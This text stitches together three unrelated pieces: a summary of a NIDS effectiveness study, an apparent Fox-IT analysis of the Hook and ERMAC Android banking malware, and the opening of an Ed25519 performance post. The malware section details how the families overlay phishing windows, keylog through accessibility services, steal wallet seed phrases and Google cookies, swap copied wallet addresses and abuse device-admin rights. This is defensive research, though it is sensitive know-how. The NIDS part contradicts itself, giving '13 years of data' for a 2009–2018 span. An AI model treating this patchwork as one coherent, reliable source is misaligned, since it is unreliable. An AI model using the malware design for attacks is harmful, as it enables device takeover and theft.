The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field of network security, it’s been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost just as long [1]. Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that inform the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with the fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4]. On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets. So how much of this push is simply hype and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security? To answer this, we analyzed alert and incident data from Fox-IT, and the many proprietary and commercial rulesets employed at Fox-IT spanning from mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.
NIDS environment
First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, where they are tweaked until its performance is deemed acceptable, which can vary depending on the novelty, severity, etc., of the threat it is trying to detect. Once that condition is reached, the rules added to the production environment, where rules can again be modified based on its performance in a real-world environment.
Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.
Custom ruleset important for proper functioning of NIDS
One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positive detections is something rule developers and SOC analysts often strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS. We found that the custom rulesets Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team prior to introducing the rules into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand). The Fox-IT ruleset is much smaller than the commercial rule sets: around 2,000 rules versus over the tens of thousands commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings here clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they clearly play a complementary role to the commercial rules, which is something we explore in a different study.
Newest rules produce most incidents
The figure below shows the average age of rules plotted against the number of incidents that such a particular rule of that age will trigger on average per week. For instance, the spike on the left represents rules that are a week old. Such a week-old rule would, then, on average, produce around four incidents per week. This means that it’s the newest rules that produce the most incidents. The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to maintain their organization and their clients secure. And secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at the possibilities of another type of NIDS optimization: performance issues. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, severity of the threat it is designed to detect, its precision (or any other metric), etc.
99.8% of (detected) true positive incidents caught before becoming successful attacks
Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. For the 13 years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They were able to condense the 62 million alerts into 150,000 incidents. Out of these 150,000 incidents, they were again condensed to 69,000 true positive incidents. And finally, out of the 69,000, only 106 of these incidents turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations that they aim to protect on a daily basis. I’ll point out, though, that this number obviously ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so, we’re confident in the accuracy of the computed percentage.
Conclusion
So, with all of these results, we demonstrate that signature-based systems are still effective, given that they are managed properly, for example, by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other different types of intrusion detection approaches, whether they’re other network-based, host-based or application-based approaches. Only once that comparison is done will we be able to determine whether these signature-based systems really do need to be phased out as archaic and obsolete pieces of technology or if they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable. This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).
[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.
[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).
[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.
[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.
Authored by Joshua Kamp (main author) and Alberto Segura.
Summary
Hook and ERMAC are Android based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.
After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.
Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.
Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70.000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.
The launch of Hook
On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.
Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.
Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7.000 per month.
The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.
Command comparison
Analyst’s note:The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.
While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis did lead us to find several new commands and features on Hook, as can be seen just looking at the number of commands implemented in each variant.
Sample
Number of commands
Hook sample #1
58
Hook sample #2
68
Ermac sample #1 #2
30
All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.
Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.
When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).
Hook command: start_vnc
The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.
In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.
Command implementation
For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:
This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.
Russian commands
Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.
The command above translates to “Die_he_who_reversed_this“.
All the Russian commands create a file named “system.apk” in the “apk” directory and immediately deletes it. It appears that the authors have recently adapted their approach to managing a reputable business, as these commands were removed in the latest Hook sample that we analysed.
New commands in Hook V2
In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:
Command
Description
send_sms_many
Sends an SMS message to multiple phone numbers
addwaitview
Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
removewaitview
Removes the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command
addview
Adds a new view with a black background that covers the entire screen
removeview
Removes the view with the black background that was added by the “addview” command
cookie
Steals session cookies (targets victim’s Google account)
safepal
Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
exodus
Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
takephoto
Takes a photo of the victim using the front facing camera
One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.
More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.
Device Admin abuse
Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.
DeviceAdminReceiver and policies
To implement custom device admin functionality in a new class, it should extend the “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.
In the screenshot above, you can see an XML file declared as follows: android:resource=”@xml/buyanigetili. This file will contain the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:
Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.
Device Admin Policy
Description
USES_POLICY_FORCE_LOCK
The app can lock the device
USES_POLICY_WIPE_DATA
The app can factory reset the device
USES_POLICY_RESET_PASSWORD
The app can reset the device’s password/pin code
USES_POLICY_DISABLE_KEYGUARD_FEATURES
The app can disable use of keyguard (lock screen) features, such as the fingerprint scanner
USES_POLICY_WATCH_LOGIN
The app can watch login attempts from the user
The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:
The onReceive() method is the entry point for broadcasts that are intercepted by the device admin receiver. In ERMAC and Hook 1 this only performs a check to see whether the received parameters are null and will throw an exception if they are.
DeviceAdminReceiver additions in latest version of Hook
In the latest edition of Hook, the class to extend the DeviceAdminReceiver does not just override the “onReceive” method. It also overrides the following methods:
Device Admin Method
Description
onDisableRequested()
Called when the user attempts to disable device admin. Gives the developer a chance to present a warning message to the user
onDisabled()
Called prior to device admin being disabled. Upon return, the app can no longer use the protected parts of the DevicePolicyManager API
onEnabled()
Called after device admin is first enabled. At this point, the app can use “DevicePolicyManager” to set the desired policies
onPasswordFailed()
Called when the user has entered an incorrect password for the device
onPasswordSucceeded()
Called after the user has entered a correct password for the device
When the victim attempts to disable device admin, a warning message is displayed that contains the text “Your mobile is die”.
The fingerprint scanner will be disabled when an incorrect password was entered on the victim’s device. Possibly to make it easier to break into the device later, by forcing the victim to enter their PIN and capturing it.
All keyguard (lock screen) features are enabled again when a correct password was entered on the victim’s device.
Overlay attacks
Overlay attacks, also known as injections, are a popular tactic to steal credentials on Android devices. When an app has permission to draw overlays, it can display content on top of other apps that are running on the device. This is interesting for threat actors, because it allows them to display a phishing window over a legitimate app. When the victim enters their credentials in this window, the malware will capture them.
Both ERMAC and Hook use web injections to display a phishing window as soon as it detects a targeted app being launched on the victim’s device.
In the screenshot above, you can see how ERMAC and Hook set up a WebView component and load the HTML code to be displayed over the target app by calling webView5.loadDataWithBaseURL(null, s6, “text/html”, “UTF-8”, null) and this.setContentView() on the WebView object. The “s6” variable will contain the data to be loaded. The main functionality is the same for both variants, with Hook having some additional logging messages.
The importance of accessibility services
Accessibility Service abuse plays an important role when it comes to web injections and other automated feature in ERMAC and Hook. Accessibility services are used to assist users with disabilities, or users who may temporarily be unable to fully interact with their Android device. For example: users that are driving might need additional or alternative interface feedback. Accessibility services run in the background and receive callbacks from the system when AccessibilityEvent is fired. Apps with accessibility service can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, they can get the package name, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities such as: keylogging, automatically granting itself additional permissions, and monitoring foreground apps and overlaying them with phishing windows.
When ERMAC or Hook malware is first launched, it prompts the victim with a window that instructs them to enable accessibility services for the malicious app.
A warning message is displayed before enabling the accessibility service, which shows what actions the app will be able to perform when this is enabled.
With accessibility services enabled, ERMAC and Hook malware automatically grants itself additional permissions such as permission to draw overlays. The onAccessibilityEvent() method monitors the package names from received accessibility events, and the web injection related code will be executed when a target app is launched.
Targeted applications
When the infected device is ready to communicate with the C2 server, it sends a list of applications that are currently installed on the device. The C2 server then responds with the target apps that it has injections for. While dynamically analysing the latest version of Hook, we sent a custom HTTP request to the C2 server to make it believe that we have a large amount of apps (700+) installed. For this, we used the list of package names that CSIRT KNF had shared in an analysis report of Hook [2].
The server responded with the list of target apps that the malware can display phishing windows for. Most of the targeted apps in both Hook and ERMAC are related to banking.
Keylogging
Keylogging functionality can be found in the onAccessibilityEvent() method of both ERMAC and Hook. For every accessibility event type that is triggered on the infected device, a method is called that contains keylogger functionality. This method then checks what the accessibility event type was to label the log and extracts the text from it. Comparing the code implementation of keylogging in ERMAC to Hook, there are some slight differences in the accessibility event types that it checks for. But the main functionality of extracting text and sending it to the C2 with a certain label is the same.
The ERMAC keylogger contains an extra check for accessibility event “TYPE_VIEW_SELECTED” (triggered when a user selects a view, such as tapping on a button). Accessibility services can extract information about a selected view, such as the text, and that is exactly what is happening here.
Hook specifically checks for two other accessibility events: the “TYPE_WINDOW_STATE_CHANGED” event (triggered when the state of an active window changes, for example when a new window is opened) or the “TYPE_WINDOW_CONTENT_CHANGED” event (triggered when the content within a window changes, like when the text within a window is updated).
It checks for these events in combination with the content change type
“CONTENT_CHANGE_TYPE_TEXT” (indicating that the text of an UI element has changed). This tells us that the accessibility service is interested in changes of the textual content within a window, which is not surprising for a keylogger.
Stealing of crypto wallet seed phrases
Automatic stealing of recovery seeds from crypto wallets is one of the main features in ERMAC and Hook. This feature is actively developed, with support added for extra crypto wallets in the latest version of Hook.
For this feature, the accessibility service first checks if a crypto wallet app has been opened. Then, it will find UI elements by their ID (such as “com.wallet.crypto.trustapp:id/wallets_preference” and “com.wallet.crypto.trustapp:id/item_wallet_info_action”) and automatically clicks on these elements until it navigated to the view that contains the recovery seed phrase. For the crypto wallet app, it will look like the user is browsing to this phrase by themselves.
Once the window with the recovery seed phrase is reached, it will extract the words from the recovery seed phrase and send them to the C2 server.
The main implementation is the same in ERMAC and Hook for this feature, with Hook containing some extra logging messages and support for stealing seed phrases from additional cryptocurrency wallets.
Replacing copied crypto wallet addresses
Besides being able to automatically steal recovery seeds from opened crypto wallet apps, ERMAC and Hook can also detect whether a wallet address has been copied and replaces the clipboard with their own wallet address. It does this by monitoring for the “TYPE_VIEW_TEXT_CHANGED” event, and checking whether the text matches a regular expression for Bitcoin and Ethereum wallet addresses. If it matches, it will replace the clipboard text with the wallet address of the threat actor.
The wallet addresses that the actors use in both ERMAC and Hook are bc1ql34xd8ynty3myfkwaf8jqeth0p4fxkxg673vlf for Bitcoin and 0x3Cf7d4A8D30035Af83058371f0C6D4369B5024Ca for Ethereum. It’s worth mentioning that these wallet addresses are the same in all samples that we analysed. It appears that this feature has not been very successful for the actors, as they have received only two transactions at the time of writing.
Since the feature has been so unsuccessful, we assume that both received transactions were initiated by the actors themselves. The latest transaction was received from a verified Binance exchange wallet, and it’s unlikely that this comes from an infected device. The other transaction comes from a wallet that could be owned by the Hook actors.
Stealing of session cookies
The “cookie” command is exclusive to Hook and was only added in the latest version of this malware. This feature allows the malware operator to steal session cookies in order to take over the victim’s login session. To do so, a new WebViewClient is set up. When the victim has logged onto their account, the onPageFinished() method of the WebView will be called and it sends the stolen cookies to the C2 server.
All cookie stealing code is related to Google accounts. This is in line with DukeEugene’s announcement of new features that were posted about on April 1st, 2023. See #12 in the screenshot below.
C2 communication protocol
HTTP in ERMAC
ERMAC is known to use the HTTP protocol for communicating with the C2 server, where data is encrypted using AES-256-CBC and then Base64 encoded. The bot sends HTTP POST requests to a randomly generated URL that ends with “.php/” (note that the IP of the C2 server remains the same).
WebSockets in Hook
The first editions of Hook introduced WebSocket communication using Socket.IO, and data is encrypted using the same mechanism as in ERMAC. The Socket.IO library is built on top of the WebSocket protocol and offers low-latency, bidirectional and event-based communication between a client and a server. Socket.IO provides additional guarantees such as fallback to the HTTP protocol and automatic reconnection [3].
The screenshot above shows that the login command was issued to the server, with the user ID of the infected device being sent as encrypted data. The “42” at the beginning of the message is standard in Socket.IO, where the “4” stands for the Engine.IO “message” packet type and the “2” for Socket.IO’s “message” packet type [3].
Mix and match – Protocols in latest versions of Hook
The latest Hook version that we’ve analysed contains the ERMAC HTTP protocol implementation, as well as the WebSocket implementation which already existed in previous editions of Hook. The Hook code snippet below shows that it uses the exact same code implementation as observed in ERMAC to build the URLs for HTTP requests.
Both Hook and ERMAC use the “checkAP” command to check for commands sent by the C2 server. In the screenshot below, you can see that the malware operator sent the “killme” command to the infected device to uninstall Hook. This shows that the ERMAC HTTP protocol is actively used in the latest versions of Hook, together with the already existing WebSocket implementation.
C2 servers
During our investigation into the technical differences between Hook and ERMAC, we have also collected C2 servers related to both families. From these servers, Russia is clearly the preferred country for hosting Hook and ERMAC C2s. We have identified a total of 23 Hook C2 servers that are hosted in Russia.
Other countries that we have found ERMAC and Hook are hosted in are:
The Netherlands
United Kingdom
United States
Germany
France
Korea
Japan
The end?
On the 19th of April 2023, DukeEugene announced that they are closing the Hook project due to leaving for “special military operation”. The actor mentions that the coder of the Hook project, who goes by the nickname “RedDragon”, will continue to support their clients until their lease runs out.
Two days prior to this announcement, the coder of Hook created a post stating that the source code of Hook is for sale at a price of $70.000. Nearly a month later, on May 11th, the coder asked if the thread could be closed as the source code was sold.
Observations
In the “Replacing copied crypto wallet addresses” section of this blog, we mentioned that the first received transaction comes from an Ethereum wallet address that could possibly be owned by the Hook actors. We noticed that this wallet received a transaction of roughly $25.000 the day after Hook was announced sold. This could be a coincidence, but the fact that this wallet was also the first to send (a small amount of) money to the Ethereum address that is hardcoded in Hook and ERMAC makes us suspect this.
We can’t verify whether the messages from DukeEugene and RedDragon are true. But if they are, we expect to see interesting new forks of Hook in the future.
In this blog we’ve debunked DukeEugene’s statement of Hook being fully developed from scratch. Additionally, in DukeEugene’s advertisement of HookBot we see a screenshot of the Hook panel that seemed to show similarities with ERMAC’s panel.
Conclusion
While the actors of Hook had announced that the malware was written from scratch, it is clear that the ERMAC source code was used as a base. All commands that are present in ERMAC also exist in Hook, and the code implementation of these commands is nearly identical in both malware families. Both Hook and ERMAC contain typical features to steal credentials which are common in Android malware, such as overlay attacks/injections and keylogging. Perhaps a more interesting feature that exists in both malware families is the automated stealing of recovery seeds from cryptocurrency wallets.
While Hook was not written completely from scratch, the authors have added interesting new features compared to ERMAC. With the added capability of being able to stream the victim’s screen and interacting with the UI, operators of Hook can gain complete control over infected devices and perform actions on the user’s behalf. Other interesting new features include the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.
Besides these new features, significant changes were made in the protocol for communicating with the C2 server. The first versions of Hook introduced WebSocket communication using the Socket.IO library. The latest version of Hook added the HTTP protocol implementation that was already present in ERMAC and can use this next to WebSocket communication.
Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, with the actor claiming that he is leaving for “special military operation”. The coder of Hook has allegedly put the source code up for sale at a price of $70,000 and stated that it was sold on May 11th, 2023. If these announcements are true, it could mean that we will see interesting new forks of Hook in the future.
The following Suricata rules were tested successfully against Hook network traffic:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
The second Suricata rule uses an additional Lua script, which can be found here
List of Commands
Family
Command
Description
ERMAC, Hook 1 2
sendsms
Sends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2
startussd
Executes a given USSD code on the victim’s device
ERMAC, Hook 1 2
forwardcall
Sets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 2
push
Displays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 2
getcontacts
Gets list of all contacts on the victim’s device
ERMAC, Hook 1 2
getaccounts
Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2
logaccounts
Gets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2
getinstallapps
Gets a list of the installed apps on the victim’s device
ERMAC, Hook 1 2
getsms
Steals all SMS messages from the victim’s device
ERMAC, Hook 1 2
startinject
Performs a phishing overlay attack against the given application
ERMAC, Hook 1 2
openurl
Opens the specified URL
ERMAC, Hook 1 2
startauthenticator2
Starts the Google Authenticator app
ERMAC, Hook 1 2
trust
Launches the Trust Wallet app
ERMAC, Hook 1 2
mycelium
Launches the Mycelium Wallet app
ERMAC, Hook 1 2
piuk
Launches the Blockchain Wallet app
ERMAC, Hook 1 2
samourai
Launches the Samourai Wallet app
ERMAC, Hook 1 2
bitcoincom
Launches the Bitcoin Wallet app
ERMAC, Hook 1 2
toshi
Launches the Coinbase Wallet app
ERMAC, Hook 1 2
metamask
Launches the Metamask Wallet app
ERMAC, Hook 1 2
sendsmsall
Sends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2
startapp
Starts the app specified in the payload
ERMAC, Hook 1 2
clearcash
Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2
clearcache
Sets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2
calling
Calls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 2
deleteapplication
Uninstalls a specified application
ERMAC, Hook 1 2
startadmin
Sets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 2
killme
Stores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 2
updateinjectandlistapps
Gets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 2
gmailtitles
Sets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 2
getgmailmessage
Sets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 2
start_vnc
Starts capturing the victim’s screen constantly (streaming)
Hook 1 2
stop_vnc
Stops capturing the victim’s screen constantly (streaming)
Hook 1 2
takescreenshot
Takes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 2
swipe
Performs a swipe gesture with the specified 4 coordinates
Hook 1 2
swipeup
Perform a swipe up gesture
Hook 1 2
swipedown
Performs a swipe down gesture
Hook 1 2
swipeleft
Performs a swipe left gesture
Hook 1 2
swiperight
Performs a swipe right gesture
Hook 1 2
scrollup
Performs a scroll up gesture
Hook 1 2
scrolldown
Performs a scroll down gesture
Hook 1 2
onkeyevent
Performs a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS
Hook 1 2
onpointerevent
Sets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 2
longpress
Dispatches a long press gesture at the specified coordinates
Hook 1 2
tap
Dispatches a tap gesture at the specified coordinates
Hook 1 2
clickat
Clicks at a specific UI element
Hook 1 2
clickattext
Clicks on the UI element with a specific text value
Hook 1 2
clickatcontaintext
Clicks on the UI element that contains the payload text
Hook 1 2
cuttext
Replaces the clipboard on the victim’s device with the payload text
Hook 1 2
settext
Sets a specified UI element to the specified text
Hook 1 2
openapp
Opens the specified app
Hook 1 2
openwhatsapp
Sends a message through Whatsapp to the specified number
Hook 1 2
addcontact
Adds a new contact to the victim’s device
Hook 1 2
getcallhistory
Gets a log of the calls that the victim made
Hook 1 2
makecall
Calls the number specified in the payload
Hook 1 2
forwardsms
Sets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 2
getlocation
Gets the geographic coordinates (latitude and longitude) of the victim
Hook 1 2
getimages
Gets list of all images on the victim’s device
Hook 1 2
downloadimage
Downloads an image from the victim’s device
Hook 1 2
fmmanager
Either lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2
send_sms_many
Sends an SMS message to multiple phone numbers
Hook 2
addwaitview
Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2
removewaitview
Removes a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2
addview
Adds a new view with a black background that covers the entire screen
Hook 2
removeview
Removes a “LinearLayout” view group, which arranges other views either horizontally in a single column or vertically in a single row. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2
cookie
Steals session cookies (targets victim’s Google account)
Hook 2
safepal
Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2
exodus
Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2
takephoto
Takes a photo of the victim using the front facing camera
This post is about a rather technical coding strategy choice that arises when implementing cryptographic algorithms on some elliptic curves, namely how to represent elements of the base field. We will be discussing Curve25519 implementations, in particular as part of Ed25519 signatures, as specified in RFC 8032. The most widely used Rust implementation of these operations is the curve25519-dalek library. My own research library is crrl, also written in plain Rust (no assembly); it is meant for research purposes, but I write it using all best practices for production-level implementations, e.g. it is fully constant-time and offers an API amenable to integration into various applications.
The following table measures performance of Ed25519 signature generation and verification with these libraries, using various backend implementations for operations in the base field (integers modulo 2255 – 19), on two test platforms (64-bit x86, and 64-bit RISC-V):
Implementation
x86 (Intel “Coffee Lake”)
RISC-V (SiFive U74)
Library
Backend
sign
verify
sign
verify
crrl
m64
49130
108559
202021
412764
m51
70149
148653
158928
304902
curve25519-dalek
simd
59553
116243
–
–
serial
59599
169621
180142
449980
fiat
70552
198289
187220
429755
Ed25519 performance (in clock cycles), on x86 and RISC-V.
Test platforms are the following:
x86: an Intel Core i5-8259U CPU, running at 2.30 GHz (TurboBoost is disabled). This uses “Coffee Lake” cores (one of the late variants of the “Skylake” line). Operating system is Linux (Ubuntu 22.04), in 64-bit mode.
RISC-V: a StarFive VisionFive2 board with a StarFive JH7110 CPU, running at 1 GHz. The CPU contains four SiFive U74 cores and implements the I, M, C, Zba and Zbb architecture extensions (and some others which are not relevant here). Operating system is again Linux (Ubuntu 23.04), in 64-bit mode.
In both cases, the current Rust “stable” version is used (1.72.0, from 2023-08-23), and compilation uses the environment variable RUSTFLAGS=”-C target-cpu=native” to allow the compiler to use all opcodes supported by the current platform. The computation is performed over a single core, with measurements averaged over randomized inputs. The CPU cycle counter is used. Figures above are listed with many digits, but in practice there is a bit of natural variance due to varying inputs (signature verification is not constant-time, since it uses only public data) and, more generally, because of the effect of various operations also occurring within the CPU (e.g. management mode, cache usage from other cores, interruptions from hardware…), so that the measured values should be taken with a grain of salt (roughly speaking, differences below about 3% are not significant).
